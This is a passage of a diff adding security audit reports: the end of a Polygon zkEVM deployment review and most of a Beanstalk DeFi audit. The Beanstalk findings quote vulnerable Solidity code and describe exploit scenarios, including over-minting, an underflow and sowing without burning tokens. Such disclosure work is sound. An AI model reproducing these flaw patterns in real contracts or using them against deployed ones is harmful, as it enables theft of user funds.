on Solidity 0.8.9 and one based on Solidity 0.8.17. This is not a security risk, but it is less consistent. 47 • PolygonZkEVM proxy uses Solidity v0.8.9 • PolygonZkEVMGlobalExitRoot Proxy uses Solidity v0.8.9 • PolygonZkEVMBridge proxy uses Solidity v0.8.17 Polygon: Etherscan does not currently let you verify your code if a verification matching that same bytecode already exists. We will contact Etherscan to allow verification without junk code. The PolygonZkEVMBridge is deployed via PolygonZkEVMDeployer to allow deployment with the same address on all chains. This is why this proxy uses Solidity 0.8.17. Otherwise the proxies are the standard version. 6.3.3 L2 deployment On the L2 (e.g. the zkEVM itself), the following contracts are deployed. • L2 PolygonZkEVMBridge proxy • L2 PolygonZkEVMBridge implementation • L2 PolygonZkEVMGlobalExitRootL2 proxy • L2 PolygonZkEVMGlobalExitRootL2 implementation • L2 PolygonZkEVMDeployer • L2 PolygonZkEVMTimelock • L2 ProxyAdmin 6.3.4 Findings The deployments on L2 where not checked because ZKEVM Polygonscan isn’t available yet and the contracts are not yet verified. 48 diff --git a/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt b/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt new file mode 100644 index 0000000..cf6bc99 --- /dev/null +++ b/findings_newupdate/tob/2022-07-beanstalk-securityreview.txt @@ -0,0 +1,12 @@ +1. Attackers could mint more Fertilizer than intended due to an unused variable Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-001 Target: protocol/contracts/farm/facets/FertilizerFacet.sol Description Due to an unused local variable, an attacker could mint more Fertilizer than should be allowed by the sale. The mintFertilizer() function checks that the _amount variable is no greater than the remaining variable; this ensures that more Fertilizer than intended cannot be minted; however, the _amount variable is not used in subsequent function calls—instead, the amount variable is used; the code effectively skips this check, allowing users to mint more Fertilizer than required to recapitalize the protocol. function mintFertilizer ( uint128 amount , uint256 minLP , LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256 (amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256 ( amount ).mul(1e6), msg.sender , mode ); uint128 id = LibFertilizer.addFertilizer( uint128 (s.season.current), amount , minLP ); C.fertilizer().beanstalkMint( msg.sender , uint256 (id), amount , s.bpf); } Figure 1.1: The mintFertilizer() function in FertilizerFacet.sol#L35- Note that this flaw can be exploited only once: if users mint more Fertilizer than intended, the remainingRecapitalization() function returns 0 because the dollarPerUnripeLP() and unripeLP() . totalSupply() variables are constants. function remainingRecapitalization() internal view returns (uint256 remaining) { } AppStorage storage s = LibAppStorage.diamondStorage(); uint256 totalDollars = C .dollarPerUnripeLP() .mul(C.unripeLP().totalSupply()) .div(DECIMALS); if (s.recapitalized >= totalDollars) return 0; return totalDollars.sub(s.recapitalized); Figure 1.2: The remainingRecapitalization() function in LibFertilizer.sol#L132-145 Exploit Scenario Recapitalization of the Beanstalk protocol is almost complete; only 100 units of Fertilizer for sale remain. Eve, a malicious user, calls mintFertilizer() with an amount of 10 million, significantly over-funding the system. Because the Fertilizer supply increased significantly above the theoretical maximum, other users are entitled to a much smaller yield than expected. Recommendations Short term, use _amount instead of amount as the parameter in the functions that are called after mintFertilizer() . Long term, thoroughly document the expected behavior of the FertilizerFacet contract and the properties (invariants) it should enforce, such as “token amounts above the maximum recapitalization threshold cannot be sold.” Expand the unit test suite to test that these properties hold. +2. Lack of a two-step process for ownership transfer Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-BEANS-002 Target: protocol/contracts/farm/facets/OwnershipFacet.sol Description The transferOwnership() function is used to change the owner of the Beanstalk protocol. This function calls the setContractOwner() function, which immediately sets the contract’s new owner. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function transferOwnership ( address _newOwner ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.setContractOwner(_newOwner); } Figure 2.1: The transferOwnership() function in OwnershipFacet.sol#L13-16 Exploit Scenario The owner of the Beanstalk contracts is a community controlled multisignature wallet. The community agrees to upgrade to an on-chain voting system, but the wrong address is mistakenly provided to its call to transferOwnership() , permanently misconfiguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes. +3. Possible underflow could allow more Fertilizer than MAX_RAISE to be minted Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-003 Target: protocol/contracts/fertilizer/FertilizerPremint.sol Description The remaining() function could underflow, which could allow the Barn Raise to continue indefinitely. Fertilizer is an ERC1155 token issued for participation in the Barn Raise, a community fundraiser intended to recapitalize the Beanstalk protocol with Bean and liquidity provider (LP) tokens that were stolen during the April 2022 governance hack. Fertilizer entitles holders to a pro rata portion of one-third of minted Bean tokens if the Fertilizer token is active, and it can be minted as long as the recapitalization target ($77 million) has not been reached. Users who want to buy Fertilizer call the mint() function and provide one USDC for each Fertilizer token they want to mint. function mint(uint256 amount) external payable nonReentrant { uint256 r = remaining(); if (amount > r) amount = r; __mint(amount); IUSDC.transferFrom(msg.sender, CUSTODIAN, amount); } Figure 3.1: The mint() function in FertilizerPremint.sol#L51-56 The mint() function first checks how many Fertilizer tokens remain to be minted by calling the remaining() function (figure 3.2); if the user is trying to mint more Fertilizer than available, the mint() function mints all of the Fertilizer tokens that remain. function remaining() public view returns (uint256) { return MAX_RAISE - IUSDC.balanceOf(CUSTODIAN); } Figure 3.2: The remaining() function in FertilizerPremint.sol#L84- However, the FertilizerPremint contract does not use Solidity 0.8, so it does not have native overflow and underflow protection. As a result, if the amount of Fertilizer purchased reaches MAX_RAISE (i.e., 77 million), an attacker could simply send one USDC to the CUSTODIAN wallet to cause the remaining() function to underflow, allowing the sale to continue indefinitely. In this particular case, Beanstalk protocol funds are not at risk because all the USDC used to purchase Fertilizer tokens is sent to a Beanstalk community-owned multisignature wallet; however, users who buy Fertilizer after such an exploit would lose the gas funds they spent, and the project would incur further reputational damage. Exploit Scenario The Barn Raise is a total success: the MAX_RAISE amount is hit, meaning that 77 million Fertilizer tokens have been minted. Alice, a malicious user, notices the underflow risk in the remaining() function; she sends one USDC to the CUSTODIAN wallet, triggering the underflow and causing the function to return the maxuint256 instead of MAX_RAISE . As a result, the sale continues even though the MAX_RAISE amount was reached. Other users, not knowing that the Barn Raise should be complete, continue to successfully mint Fertilizer tokens until the bug is discovered and the system is paused to address the issue. While no Beanstalk funds are lost as a result of this exploit, the users who continued minting Fertilizer after the MAX_RAISE was reached lose all the gas funds they spent. Recommendations Short term, add a check in the remaining() function so that it returns 0 if USDC.balanceOf(CUSTODIAN) is greater than or equal to MAX_RAISE . This will prevent the underflow from being triggered. Because the function depends on the CUSTODIAN ’s balance, it is still possible for someone to send USDC directly to the CUSTODIAN wallet and reduce the amount of “available” Fertilizer; however, attackers would lose their money in the process, meaning that there are no incentives to perform this kind of action. Long term, thoroughly document the expected behavior of the FertilizerPremint contract and the properties (invariants) it should enforce, such as “no tokens can be minted once the MAX_RAISE is reached.” Expand the unit test suite to test that these properties hold. +4. Risk of Fertilizer id collision that could result in loss of funds Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-004 Target: protocol/contracts/fertilizer/Fertilizer.sol Description If a user mints Fertilizer tokens twice during two different seasons, the same token id for both tokens could be calculated, and the first entry will be overridden; if this occurs and the bpf value changes, the user would be entitled to less yield than expected. To mint new Fertilizer tokens, users call the mintFertilizer() function in the FertilizerFacet contract. An id is calculated for each new Fertilizer token that is minted; not only is this id an identifier for the token, but it also represents the endBpf period, which is the moment at which the Fertilizer reaches “maturity” and can be redeemed without incurring any penalty. function mintFertilizer( uint128 amount, uint256 minLP, LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256(amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256(amount).mul(1e6), msg.sender, mode ); uint128 id = LibFertilizer.addFertilizer( uint128(s.season.current), amount, minLP ); C.fertilizer().beanstalkMint(msg.sender, uint256(id), amount, s.bpf); } Figure 4.1: The mintFertilizer() function in Fertilizer.sol#L35-55 The id is calculated by the addFertilizer() function in the LibFertilizer library as the sum of 1 and the bpf and humidity values. function addFertilizer( uint128 season, uint128 amount, uint256 minLP ) internal returns (uint128 id) { AppStorage storage s = LibAppStorage.diamondStorage(); uint256 _amount = uint256(amount); // Calculate Beans Per Fertilizer and add to total owed uint128 bpf = getBpf(season); s.unfertilizedIndex = s.unfertilizedIndex.add( _amount.mul(uint128(bpf)) ); // Get id id = s.bpf.add(bpf); [...] } function getBpf(uint128 id) internal pure returns (uint128 bpf) { bpf = getHumidity(id).add(1000).mul(PADDING); } function getHumidity(uint128 id) internal pure returns (uint128 humidity) { if (id == REPLANT_SEASON) return 5000; if (id >= END_DECREASE_SEASON) return 200; uint128 humidityDecrease = id.sub(REPLANT_SEASON + 1).mul(5); humidity = RESTART_HUMIDITY.sub(humidityDecrease); } Figure 4.2: The id calculation in LibFertilizer.sol#L32-67 However, the method that generates these token id s does not prevent collisions. The bpf value is always increasing (or does not move), and humidity decreases every season until it reaches 20%. This makes it possible for a user to mint two tokens in two different seasons with different bpf and humidity values and still get the same token id . function beanstalkMint(address account, uint256 id, uint128 amount, uint128 bpf) external onlyOwner { _balances[id][account].lastBpf = bpf; _safeMint( account, id, amount, bytes('0') ); } Figure 4.3: The beanstalkMint() function in Fertilizer.sol#L40-48 An id collision is not necessarily a problem; however, when a token is minted, the value of the lastBpf field is set to the bpf of the current season, as shown in figure 4.3. This field is very important because it is used to determine the penalty, if any, that a user will incur when redeeming Fertilizer. To redeem Fertilizer, users call the claimFertilizer() function, which in turn calls the beanstalkUpdate() function on the Fertilizer contract. function claimFertilized(uint256[] calldata ids, LibTransfer.To mode) external payable { } uint256 amount = C.fertilizer().beanstalkUpdate(msg.sender, ids, s.bpf); LibTransfer.sendToken(C.bean(), amount, msg.sender, mode); Figure 4.4: The claimFertilizer() function in FertilizerFacet.sol#L27-33 function beanstalkUpdate( address account, uint256[] memory ids, uint128 bpf ) external onlyOwner returns (uint256) { return __update(account, ids, uint256(bpf)); } function __update( address account, uint256[] memory ids, uint256 bpf ) internal returns (uint256 beans) { for (uint256 i = 0; i < ids.length; i++) { uint256 stopBpf = bpf < ids[i] ? bpf : ids[i]; uint256 deltaBpf = stopBpf - _balances[ids[i]][account].lastBpf; if (deltaBpf > 0) { beans = beans.add(deltaBpf.mul(_balances[ids[i]][account].amount)); _balances[ids[i]][account].lastBpf = uint128(stopBpf); } } emit ClaimFertilizer(ids, beans); } Figure 4.5: The update flow in Fertilizer.sol#L32-38 and L72-86 The beanstalkUpdate() function then calls the __update() function. This function first calculates the stopBpf value, which is one of two possible values. If the Fertilizer is being redeemed early, stopBpf is the bpf at which the Fertilizer is being redeemed; if the token is being redeemed at “maturity” or later, stopBpf is the token id (i.e., the endBpf value). Afterward, __update() calculates the deltaBpf value, which is used to determine the penalty, if any, that the user will incur when redeeming the token; deltaBpf is calculated using the stopBpf value that was already defined and the lastBpf value, which is the bpf corresponding to the last time the token was redeemed or, if it was never redeemed, the bpf at the moment the token was minted. Finally, the token’s lastBpf field is updated to the stopBpf . Because of the id collision, users could accidentally mint Fertilizer tokens with the same id in two different seasons and override their first mint’s lastBpf field, ultimately reducing the amount of yield they are entitled to. Exploit Scenario Imagine the following scenario: ● ● It is currently the first season; the bpf is 0 and the humidity is 40%. Alice mints 100 Fertilizer tokens with an id of 41 (the sum of 1 and the bpf ( 0 ) and humidity ( 40 ) values), and lastBpf is set to 0 . Some time goes by, and it is now the third season; the bpf is 35 and the humidity is 5%. Alice mints one additional Fertilizer token with an id of 41 (the sum of 1 and the bpf ( 35 ) and humidity ( 5 ) values), and lastBpf is set to 35 . Because of the second mint, the lastBpf field of Alice’s Fertilizer tokens is overridden, making her lose a substantial amount of the yield she was entitled to: ● Using the formula for calculating the number of BEAN tokens that users are entitled to, shown in figure 4.5, Alice’s original yield at “maturity” would have been 4,100 tokens: ○ deltaBpf = id - lastBpf = 41 - 0 = 41 ○ balance = 100 ○ beans received = deltaBpf * balance = 41 * 100 = 4100 ● As a result of the overridden lastBpf field, Alice’s yield instead ends up being only 606 tokens: ○ deltaBpf = id - lastBpf = 41 - 35 = 6 ○ balance = 101 ○ beans received = deltaBpf * balance = 6 * 101 = 606 Recommendations Short term, separate the role of the id into two separate variables for the token index and endBpf . That way, the index can be optimized to prevent collisions, while endBpf can accurately represent the data it needs to represent. Alternatively, modify the relevant code so that when an id collision occurs, it either reverts or redeems the previous Fertilizer first before minting the new tokens. However, these alternate remedies could introduce new edge cases or could result in a degraded user experience; if either alternate remedy is implemented, it would need to be thoroughly documented to inform the users of its particular behavior. Long term, thoroughly document the expected behavior of the associated code and include regression tests to prevent similar issues from being introduced in the future. Additionally, exercise caution when using one variable to serve two purposes. Gas savings should be measured and weighed against the increased complexity. Developers should be aware that performing optimizations could introduce new edge cases and increase the code’s complexity. +5. The sunrise() function rewards callers only with the base incentive Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-005 Target: protocol/contracts/farm/facets/SeasonFacet/SeasonFacet.sol Description The increasing incentive that encourages users to call the sunrise() function in a timely manner is not actually applied. According to the Beanstalk white paper, the reward paid to users who call the sunrise() function should increase by 1% every second (for up to 300 seconds) after this method is eligible to be called; this incentive is designed so that, even when gas prices are high, the system can move on to the next season in a timely manner. This increasing incentive is calculated and included in the emitted logs, but it is not actually applied to the number of Bean tokens rewarded to users who call sunrise() . function incentivize ( address account , uint256 amount ) private { uint256 timestamp = block.timestamp .sub( s.season.start.add(s.season.period.mul(season())) ); if (timestamp > 300 ) timestamp = 300 ; uint256 incentive = LibIncentive.fracExp(amount, 100 , timestamp, 1 ); C.bean().mint(account, amount ); emit Incentivization(account, incentive ); } Figure 5.1: The incentive calculation in SeasonFacet.sol#70-78 Exploit Scenario Gas prices suddenly increase to the point that it is no longer profitable to call sunrise() . Given the lack of an increasing incentive, the function goes uncalled for several hours, preventing the system from reacting to changing market conditions. Recommendations Short term, pass the incentive value instead of amount into the mint() function call. Long term, thoroughly document the expected behavior of the SeasonFacet contract and the properties (invariants) it should enforce, such as “the caller of the sunrise() function receives the right incentive.” Expand the unit test suite to test that these properties hold. Additionally, thoroughly document how the system would be affected if the sunrise() function were not called for a long period of time (e.g., in times of extreme network congestion). Finally, determine whether the Beanstalk team should rely exclusively on third parties to call the sunrise() function or whether an alternate system managed by the Beanstalk team should be adopted in addition to the current system. For example, an alternate system could involve an off-chain monitoring system and a trusted execution flow. +6. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-BEANS-006 Target: The Beanstalk protocol Description Beanstalk has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js —causes a security vulnerability in the Beanstalk contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. +7. Lack of support for external transfers of nonstandard ERC20 tokens Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-007 Target: protocol/contracts/farm/facets/TokenFacet.sol Description For external transfers of nonstandard ERC20 tokens via the TokenFacet contract, the code uses the standard transferFrom operation from the given token contract without checking the operation’s returndata ; as a result, successfully executed transactions that fail to transfer tokens will go unnoticed, causing confusion in users who believe their funds were successfully transferred. The TokenFacet contract exposes transferToken() , an external function that users can call to transfer ERC20 tokens both to and from the contract and between users. function transferToken( IERC20 token, address recipient, uint256 amount, LibTransfer.From fromMode, LibTransfer.To toMode ) external payable { LibTransfer.transferToken(token, recipient, amount, fromMode, toMode); } Figure 7.1: The transferToken() function in TokenFacet.sol#L39-47 This function calls the LibTransfer library, which handles the token transfer. function transferToken( IERC20 token, address recipient, uint256 amount, From fromMode, To toMode ) internal returns (uint256 transferredAmount) { if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) { token.transferFrom(msg.sender, recipient, amount); return amount; } amount = receiveToken(token, amount, msg.sender, fromMode); sendToken(token, amount, recipient, toMode); return amount; } Figure 7.2: The transferToken() function in LibTransfer.sol#L29-43 The LibTransfer library uses the fromMode and toMode values to determine a transfer’s sender and receiver, respectively; in most cases, it uses the safeERC20 library to execute transfers. However, if fromMode and toMode are both marked as EXTERNAL , then the transferFrom function of the token contract will be called directly, and safeERC20 will not be used. Essentially, if a user tries to transfer a nonstandard ERC20 token that does not revert on failure and instead indicates a transaction’s success or failure in its return data, the user could be led to believe that failed token transfers were successful. Exploit Scenario Alice uses the TokenFacet contract to transfer nonstandard ERC20 tokens that return false on failure to another contract. However, Alice accidentally inputs an amount higher than her balance. The transaction is successfully executed, but because there is no check of the false return value, Alice does not know that her tokens were not transferred. Recommendations Short term, use the safeERC20 library for external token transfers. Long term, thoroughly review and document all interactions with arbitrary tokens to prevent similar issues from being introduced in the future. +8. Plot transfers from users with allowances revert if the owner has an existing pod listing Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-008 Target: protocol/contracts/farm/facets/MarketplaceFacet.sol Description Whenever a plot transfer is executed by a user with an allowance (i.e., a transfer in which the caller was approved by the plot’s owner), the transfer will revert if there is an existing listing for the pods contained in that plot. The MarketplaceFacet contract exposes a function, transferPlot() , that allows the owner of a plot to transfer the pods in that plot to another user; additionally, the owner of a plot can call the approvePods() function (figure 8.1) to approve other users to transfer these pods on the owner’s behalf. function approvePods(address spender, uint256 amount) external payable nonReentrant { } require(spender != address(0), "Field: Pod Approve to 0 address."); setAllowancePods(msg.sender, spender, amount); emit PodApproval(msg.sender, spender, amount); Figure 8.1: The approvePods() function in MarketplaceFacet.sol#L147-155 Once approved, the given address can call the transferPlot() function to transfer pods on the owner’s behalf. The function checks and decreases the allowance and then checks whether there is an existing pod listing for the target pods. If there is an existing listing, the function tries to cancel it by calling the _cancelPodListing() function. function transferPlot( address sender, address recipient, uint256 id, uint256 start, uint256 end ) external payable nonReentrant { require( sender != address(0) && recipient != address(0), "Field: Transfer to/from 0 address." ); uint256 amount = s.a[sender].field.plots[id]; require(amount > 0, "Field: Plot not owned by user."); require(end > start && amount >= end, "Field: Pod range invalid."); amount = end - start; // Note: SafeMath is redundant here. if ( msg.sender != sender && allowancePods(sender, msg.sender) != uint256(-1) ) { decrementAllowancePods(sender, msg.sender, amount); } if (s.podListings[id] != bytes32(0)) { _cancelPodListing(id); // TODO: Look into this cancelling. } _transferPlot(sender, recipient, id, start, amount); } Figure 8.2: The transferPlot() function in MarketplaceFacet.sol#L119-145 The _cancelPodListing() function receives only an id as the input and relies on the msg.sender to determine the listing’s owner. However, if the transfer is executed by a user with an allowance, the msg.sender is the user who was granted the allowance, not the owner of the listing. As a result, the function will revert. function _cancelPodListing(uint256 index) internal { require( s.a[msg.sender].field.plots[index] > 0, "Marketplace: Listing not owned by sender." ); delete s.podListings[index]; emit PodListingCancelled(msg.sender, index); } Figure 8.3: The _cancelPodListing() function in Listing.sol#L149-156 Exploit Scenario A new smart contract that integrates with the MarketplaceFacet contract is deployed. This contract has features allowing it to manage users’ pods on their behalf. Alice approves the contract so that it can manage her pods. Some time passes, and Alice calls one of the smart contract’s functions, which requires Alice to transfer ownership of her plot to the contract. Because Alice has already approved the smart contract, it can perform the transfer on her behalf. To do so, it calls the transferPlot() function in the MarketplaceFacet contract; however, this call reverts because Alice has an open listing for the pods that the contract is trying to transfer. Recommendations Short term, add a new input to _cancelPodListing() that is equal to msg.sender if the caller is the owner of the listing, but equal to the pod owner if the caller is a user who was approved by the owner. Long term, thoroughly document the expected behavior of the MarketplaceFacet contract and the properties (invariants) it should enforce, such as “plot transfers initiated by users with an allowance cancel the owner’s listing.” Expand the unit test suite to test that these properties hold. +9. Users can sow more Bean tokens than are burned Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-BEANS-009 Target: protocol/contracts/farm/facets/FieldFacet.sol Description An accounting error allows users to sow more Bean tokens than the available soil allows. Whenever the price of Bean is below its peg, the protocol issues soil. Soil represents the willingness of the protocol to take Bean tokens off the market in exchange for a pod. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as non-callable bonds that mature on a first-in-first-out (FIFO) basis as the protocol issues new Bean tokens. Whenever soil is available, users can call the sow() and sowWithMin() functions in the FieldFacet contract. function sowWithMin( uint256 amount, uint256 minAmount, LibTransfer.From mode ) public payable returns (uint256) { uint256 sowAmount = s.f.soil; require( sowAmount >= minAmount && amount >= minAmount && minAmount > 0, "Field: Sowing below min or 0 pods." ); if (amount < sowAmount) sowAmount = amount; return _sow(sowAmount, mode); } Figure 9.1: The sowWithMin() function in FieldFacet.sol#L41-53 The sowWithMin() function ensures that there is enough soil to sow the given number of Bean tokens and that the call will not sow fewer tokens than the specified minAmount . Once it makes these checks, it calls the _sow() function. function _sow(uint256 amount, LibTransfer.From mode) internal returns (uint256 pods) { pods = LibDibbler.sow(amount, msg.sender); if (mode == LibTransfer.From.EXTERNAL) C.bean().burnFrom(msg.sender, amount); else { amount = LibTransfer.receiveToken(C.bean(), amount, msg.sender, mode); C.bean().burn(amount); } } Figure 9.2: The _sow() function in FieldFacet.sol#L55-65 The _sow() function first calculates the number of pods that will be sown by calling the sow() function in the LibDibbler library, which performs the internal accounting and calculates the number of pods that the user is entitled to. function sow(uint256 amount, address account) internal returns (uint256) { AppStorage storage s = LibAppStorage.diamondStorage(); // We can assume amount <= soil from getSowAmount s.f.soil = s.f.soil - amount ; return sowNoSoil(amount, account); } function sowNoSoil(uint256 amount, address account) internal returns (uint256) { } AppStorage storage s = LibAppStorage.diamondStorage(); uint256 pods = beansToPods(amount, s.w.yield); sowPlot(account, amount, pods); s.f.pods = s.f.pods.add(pods) ; saveSowTime(); return pods; function sowPlot( address account, uint256 beans, uint256 pods ) private { AppStorage storage s = LibAppStorage.diamondStorage(); s.a[account].field.plots[s.f.pods] = pods; emit Sow(account, s.f.pods, beans, pods); } Figure 9.3: The sow() , sowNoSoil() , and sowPlot() functions in LibDibbler.sol#L41-53 Finally, the sowWithMin() function burns the Bean tokens from the caller’s account, removing them from the supply. To do so, the function calls burnFrom() if the mode parameter is EXTERNAL (i.e., if the Bean tokens to be burned are not escrowed in the contract) and burn() if the Bean tokens are escrowed. If the mode parameter is not EXTERNAL , the receiveToken() function is executed to update the internal accounting of the contract before burning the tokens. This function returns the number of tokens that were “transferred” into the contract. In essence, the receiveToken() function allows the contract to correctly account for token transfers into it and to manage internal balances without performing token transfers. function receiveToken( IERC20 token, uint256 amount, address sender, From mode ) internal returns (uint256 receivedAmount) { if (amount == 0) return 0; if (mode != From.EXTERNAL) { receivedAmount = LibBalance.decreaseInternalBalance( sender, token, amount, mode != From.INTERNAL ); if (amount == receivedAmount || mode == From.INTERNAL_TOLERANT) return receivedAmount; } token.safeTransferFrom(sender, address(this), amount - receivedAmount); return amount; } Figure 9.4: The receiveToken() function in FieldFacet.sol#L41-53 However, if the mode parameter is INTERNAL_TOLERANT , the contract allows the user to partially fill amount (i.e., to transfer as much as the user can), which means that if the user does not own the given amount of Bean tokens, the protocol simply burns as many tokens as the user owns but still allows the user to sow the full amount . Exploit Scenario Eve, a malicious user, spots the vulnerability in the FieldFacet contract and waits until Bean is below its peg and the protocol starts issuing soil. Bean finally goes below its peg, and the protocol issues 1,000 soil. Eve deposits a single Bean token into the contract by calling the transferToken() function in the TokenFacet contract. She then calls the sow() function with amount equal to 1000 and mode equal to INTERNAL_TOLERANT . The sow() function is executed, sowing 1,000 Bean tokens but burning only a single token. Recommendations Short term, modify the relevant code so that users’ Bean tokens are burned before the accounting for the soil and pods are updated and so that, if the mode field is not EXTERNAL , the amount returned by receiveToken() is used as the input to LibDibbler.sow() . Long term, thoroughly document the expected behavior of the FieldFacet contract and the properties (invariants) it should enforce, such as “the sow() function always sows as many Bean tokens as were burned.” Expand the unit test suite to test that these properties hold. +10. Pods may never ripen Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-010 Target: The Beanstalk protocol Description Whenever the price of Bean is below its peg, the protocol takes Bean tokens off the market in exchange for a number of p ods dependent on the current interest rate. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as loans that are repaid on a FIFO basis as the protocol issues new Bean tokens. A group of pods that are created together is called a plot. The queue of plots is referred to as the pod line. The pod line has no practical bound on its length, so during periods of decreasing demand, it can grow indefinitely. No yield is awarded until the given plot owner is first in line and until the price of Bean is above its value peg. While the protocol does not default on its debt, the only way for pods to ripen is if demand increases enough for the price of Bean to be above its value peg for some time. While the price of Bean is above its peg, a portion of newly minted Bean tokens is used to repay the first plot in the pod line until fully repaid, decreasing the length of the pod line. During an extended period of decreasing supply, the pod line could grow long enough that lenders receive an unappealing time-weighted rate of return, even if the yield is increased; a sufficiently long pod line could encourage users—uncertain of whether future demand will grow enough for them to be repaid—to sell their Bean tokens rather than lending them to the protocol. Under such circumstances, the protocol will be unable to disincentivize Bean market sales, disrupting its ability to return Bean to its value peg. Exploit Scenario Bean goes through an extended period of increasing demand, overextending its supply. Then, demand for Bean tokens slowly and steadily declines, and the pod line grows in length. At a certain point, some users decide that their time-weighted rate of return is unfavorable or too uncertain despite the promised high yields. Instead of lending their Bean tokens to the protocol, they sell. Recommendations Explore options for backing Bean ’s value with an offer that is guaranteed to eventually be fulfilled. 11. Bean and the oer backing it are strongly correlated Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-011 Target: The Beanstalk protocol Description In response to prolonged periods of decreasing demand for Bean tokens, the Beanstalk protocol offers to borrow from users who own Bean tokens, decreasing the available Bean supply and returning the Bean price to its peg. To incentivize users to lend their Bean tokens to the protocol rather than immediately selling them in the market, which would put further downward pressure on the price of Bean , the protocol offers users a reward of more Bean tokens in the future. The demand for holding Bean tokens at present and the demand for receiving Bean tokens in the future are strongly correlated, introducing reflexive risk. If the demand for Bean decreases, we can expect a proportional increase in the marginal Bean supply and a decrease in demand to receive Bean in the future, weakening the system’s ability to restore Bean to its value peg. The FIFO queue of lenders is designed to combat reflexivity by encouraging rational actors to quickly support a dip in Bean price rather than selling. However, this mechanism assumes that the demand for Bean will increase in the future; investors may not share this assumption if present demand for Bean is low. Reflexivity is present whenever a stablecoin and the offer backing it are strongly correlated, even if the backing offer is time sensitive. Exploit Scenario Bean goes through an extended period of increasing demand, overextending its supply. Then, the demand for Bean slowly and steadily declines as some users lose interest in holding Bean . These same users also lose interest in receiving Bean tokens in the future, so rather than loaning their tokens to Beanstalk to earn a very high Bean -denominated yield, they sell. Recommendations Explore options for backing Bean’s value with an offer that is not correlated with demand for Bean . 12. Ability to whitelist assets uncorrelated with Bean price, misaligning governance incentives Severity: Undetermined Difficulty: Undetermined Type: Economic Finding ID: TOB-BEANS-012 Target: The Beanstalk protocol Description Stalk is the governance token of the system, rewarded to users who deposit certain whitelisted assets into the silo, the system’s asset storage. When demand for Bean increases, the protocol increases the Bean supply by minting new Bean tokens and allocating some of them to Stalk holders. Additionally, if the price of Bean remains above its peg for an extended period of time, then a season of plenty (SoP) occurs: Bean is minted and sold on the open market in exchange for exogenous assets such as ETH. These exogenous assets are allocated entirely to Stalk holders. When demand for Bean decreases, the protocol decreases the Bean supply by borrowing Bean tokens from Bean owners. If the demand for Bean is persistently low and some of these loans are never repaid, Stalk holders are not directly penalized by the protocol. However, if the only whitelisted assets are strongly correlated with the price of Bean (such as ETH:BEAN LP tokens), then the value of Stalk holders’ deposited collateral would decline, indirectly penalizing Stalk holders for an unhealthy system. If, however, exogenous assets without a strong correlation to Bean are whitelisted, then Stalk holders who have deposited such assets will be protected from financial penalties if the price of Bean crashes. Exploit Scenario Stalk holders vote to whitelist ETH as a depositable asset. They proceed to deposit ETH and begin receiving shares of rewards, including 3CRV tokens acquired during SoPs. Governance is now incentivized to increase the supply of Bean as high as possible to obtain more 3CRV rewards, which eventually results in an overextension of the Bean supply and a subsequent price crash. After the Bean price crashes, Stalk holders withdraw their deposited ETH and 3CRV rewards. Because ETH is not strongly correlated with the price of Bean, they do not suffer financial loss as a result of the crash. Alternatively, because of the lack of on-chain enforcement of off-chain votes, the above scenario could occur if the community multisignature wallet whitelists ETH, even if no related vote occurred. Recommendations Do not allow any assets that are not strongly correlated with the price of Bean to be whitelisted. Additionally, implement monitoring systems that provide alerts every time a new asset is whitelisted. 13. Unchecked burnFrom return value Severity: Informational Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-BEANS-013 Target: protocol/contracts/farm/facets/UnripeFacet.sol Description While recapitalizing the Beanstalk protocol, Bean and LP tokens that existed before the 2022 governance hack are represented as unripe tokens. Ripening is the process of burning unripe tokens in exchange for a pro rata share of the underlying assets generated during the Barn Raise. Holders of unripe tokens call the ripen function to receive their portion of the recovered underlying assets. This portion grows while the price of Bean is above its peg, incentivizing users to ripen their tokens later, when more of the loss has been recovered. The ripen code assumes that if users try to redeem more unripe tokens than they hold, burnFrom will revert. If burnFrom returns false instead of reverting, the failure of the balance check will go undetected, and the caller will be able to recover all of the underlying tokens held by 